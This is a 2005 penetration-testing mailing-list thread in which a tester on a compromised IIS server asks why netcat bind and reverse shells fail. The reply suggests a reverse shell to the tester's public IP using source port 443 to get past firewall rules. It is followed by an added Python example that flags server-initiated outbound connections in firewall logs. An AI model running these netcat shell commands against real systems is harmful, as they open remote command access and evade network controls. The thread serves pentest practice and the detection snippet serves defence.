Penetration Testing mailing list archives

RE: Netcat Question


From: "Bartholomew, Brian J" <BartholomewBJ () state gov>
Date: Wed, 1 Jun 2005 10:24:16 -0400

My guess is that you have a FW sitting in front of the web server that is not allowing either inbound connections to 
port 8000, or outbound connections to 443.  Normal FWs are set to only allow inbound 80 and 443 to the web servers, and 
outbound from those ports, not to those ports.  

Try modifying the second command to add the -p switch and specify the port 443.  Then change the destination port on 
your system at home to be some ephemeral port.

Something like: 

nc.exe -nv my_public_ip_address 1234 -p 443 -e cmd.exe

See if that works.

- Brian

-----Original Message-----
From: intel96 [mailto:intel96 () bellsouth net]
Sent: Tuesday, May 31, 2005 6:39 PM
To: pen-test () securityfocus com
Subject: Netcat Question


To All,

I am conducting a pentest and I have been able to upload netcat to the 
web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to 
establish a shell both ways, but cannot get it to work:

On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe

When I tried to connect to port 8000 on the web server I received a 
timeout on my side. I have also tried this with port 53 and it also did 
not work.

I then tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe

This did not work either. I did not see the remote system trying to 
connect to my system via my logs. I have access to upload anything to 
the system and run most commands via sql injections. I have 
administrator level access on the system at this time.

Any ideas on how I can get this shell to work? Or are there any other 
commands that may provide me more access or allow me to dump the database?

Thanks,

Intel96
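
From the defender's side, the filtering described in the reply (outbound traffic allowed "from" ports 80/443 without tracking state) can be audited in packet-filter logs: a listener's replies carry SYN+ACK or ACK, so a bare SYN leaving the web server, especially from source port 80 or 443, is a connection the server itself opened. The following is an added example, not part of the original thread; the log format, the server address 192.0.2.10 and all names are constructed assumptions.

```python
import re

# Assumed values for illustration only.
WEB_SERVER = "192.0.2.10"
SERVICE_PORTS = {80, 443}

# Constructed log format: time, direction, src ip:port, dst ip:port, TCP flags.
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<dir>IN|OUT) TCP "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"flags=(?P<flags>[A-Z]+)$"
)

# Constructed sample lines (not taken from any real system).
SAMPLE_LOG = """\
2005-06-01T10:20:01 IN TCP 198.51.100.4:51712 -> 192.0.2.10:443 flags=S
2005-06-01T10:20:01 OUT TCP 192.0.2.10:443 -> 198.51.100.4:51712 flags=SA
2005-06-01T10:21:15 OUT TCP 192.0.2.10:1045 -> 203.0.113.7:443 flags=S
2005-06-01T10:24:16 OUT TCP 192.0.2.10:443 -> 203.0.113.7:1234 flags=S
2005-06-01T10:24:17 OUT TCP 192.0.2.10:443 -> 198.51.100.4:51712 flags=PA
not a log line
"""

def classify(line):
    """Return (verdict, fields) for one log line, or None if irrelevant."""
    m = LINE.match(line.strip())
    if not m:
        return None
    f = m.groupdict()
    # Only new connections opened by the web server matter: a bare SYN going out.
    if f["dir"] != "OUT" or f["src"] != WEB_SERVER or f["flags"] != "S":
        return None
    if int(f["sport"]) in SERVICE_PORTS:
        # Replies from a listener carry SA/A/PA, never a bare SYN.
        return ("initiated-from-service-port", f)
    return ("server-initiated-outbound", f)

def scan(log_text):
    """Classify every line and keep only the flagged ones, in log order."""
    return [r for r in map(classify, log_text.splitlines()) if r]

if __name__ == "__main__":
    for verdict, f in scan(SAMPLE_LOG):
        print(f'{f["ts"]} {verdict}: {f["src"]}:{f["sport"]} -> {f["dst"]}:{f["dport"]}')
```

A stateful rule set that permits only established replies from the web server would drop both flagged connections instead of merely logging them.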


